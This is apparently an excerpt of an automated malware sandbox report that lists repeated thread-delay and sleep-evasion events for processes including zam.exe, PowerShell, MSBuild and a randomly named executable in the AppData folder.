Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595753	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595625	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595516	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595386	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595281	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595172	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595053	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594938	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594813	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594688	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594469	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594344	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594125	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 600000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599863
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599735
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599485
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599235
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598985
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598735
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598485
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598235
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598094
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597717
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597553
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597438
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597219
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597094
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596985
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596735
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596485
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596235
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595985
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595735
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595579
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595309
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595203
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595094
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594985
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594735
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594485
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594235
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 593985
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 593860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 593735
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 593610

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6129	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6780	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 3334	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 6498	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 1916
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 7902

Source: C:\Users\user\Desktop\zam.exe TID: 7660	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7448	Thread sleep count: 6129 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6056	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7444	Thread sleep count: 176 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6632	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6328	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6212	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7264	Thread sleep count: 35 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7264	Thread sleep time: -32281802128991695s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7264	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7240	Thread sleep count: 3334 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7264	Thread sleep time: -599874s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7240	Thread sleep count: 6498 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7264	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7264	Thread sleep time: -599653s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7264	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7264	Thread sleep time: -599437s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7264	Thread sleep time: -599327s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7264	Thread sleep time: -599219s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7264	Thread sleep time: -599094s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7264	Thread sleep time: -598984s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7264	Thread sleep time: -598875s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7264	Thread sleep time: -598766s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7264	Thread sleep time: -598656s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7264	Thread sleep time: -598544s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7264	Thread sleep time: -598437s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7264	Thread sleep time: -598328s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7264	Thread sleep time: -598219s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7264	Thread sleep time: -598094s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7264	Thread sleep time: -597984s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7264	Thread sleep time: -597875s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7264	Thread sleep time: -597766s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7264	Thread sleep time: -597656s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7264	Thread sleep time: -597547s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7264	Thread sleep time: -597438s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7264	Thread sleep time: -597313s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7264	Thread sleep time: -597188s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7264	Thread sleep time: -597078s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7264	Thread sleep time: -596965s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7264	Thread sleep time: -596858s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7264	Thread sleep time: -596750s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7264	Thread sleep time: -596531s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7264	Thread sleep time: -596379s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7264	Thread sleep time: -596203s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7264	Thread sleep time: -596094s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7264	Thread sleep time: -595984s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7264	Thread sleep time: -595875s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7264	Thread sleep time: -595753s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7264	Thread sleep time: -595625s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7264	Thread sleep time: -595516s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7264	Thread sleep time: -595386s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7264	Thread sleep time: -595281s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7264	Thread sleep time: -595172s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7264	Thread sleep time: -595053s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7264	Thread sleep time: -594938s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7264	Thread sleep time: -594813s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7264	Thread sleep time: -594688s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7264	Thread sleep time: -594578s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7264	Thread sleep time: -594469s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7264	Thread sleep time: -594344s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7264	Thread sleep time: -594234s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7264	Thread sleep time: -594125s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe TID: 7532	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5908	Thread sleep count: 34 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5908	Thread sleep time: -31359464925306218s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5908	Thread sleep time: -600000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7496	Thread sleep count: 1916 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5908	Thread sleep time: -599863s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7496	Thread sleep count: 7902 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5908	Thread sleep time: -599735s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5908	Thread sleep count: 31 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5908	Thread sleep time: -599610s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5908	Thread sleep time: -599485s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5908	Thread sleep time: -599360s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5908	Thread sleep time: -599235s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5908	Thread sleep time: -599110s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5908	Thread sleep time: -598985s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5908	Thread sleep time: -598860s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5908	Thread sleep time: -598735s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5908	Thread sleep time: -598610s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5908	Thread sleep time: -598485s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5908	Thread sleep time: -598360s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5908	Thread sleep time: -598235s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5908	Thread sleep time: -598094s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5908	Thread sleep time: -597717s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5908	Thread sleep time: -597553s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5908	Thread sleep time: -597438s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5908	Thread sleep time: -597328s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5908	Thread sleep time: -597219s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5908	Thread sleep time: -597094s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5908	Thread sleep time: -596985s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5908	Thread sleep time: -596860s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5908	Thread sleep time: -596735s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5908	Thread sleep time: -596610s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5908	Thread sleep time: -596485s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5908	Thread sleep time: -596360s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5908	Thread sleep time: -596235s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5908	Thread sleep time: -596110s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5908	Thread sleep time: -595985s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5908	Thread sleep time: -595860s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5908	Thread sleep time: -595735s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5908	Thread sleep time: -595579s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5908	Thread sleep time: -595453s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5908	Thread sleep time: -595309s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5908	Thread sleep time: -595203s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5908	Thread sleep time: -595094s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5908	Thread sleep time: -594985s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5908	Thread sleep time: -594860s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5908	Thread sleep time: -594735s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5908	Thread sleep time: -594610s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5908	Thread sleep time: -594485s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5908	Thread sleep time: -594360s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5908	Thread sleep time: -594235s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5908	Thread sleep time: -594110s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5908	Thread sleep time: -593985s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5908	Thread sleep time: -593860s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5908	Thread sleep time: -593735s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5908	Thread sleep time: -593610s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\zam.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599874	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599653	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599327	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599094	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598544	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598094	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597438	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597313	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597188	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597078	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596965	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596858	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596750	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596531	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596379	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596203	Jump to behavior
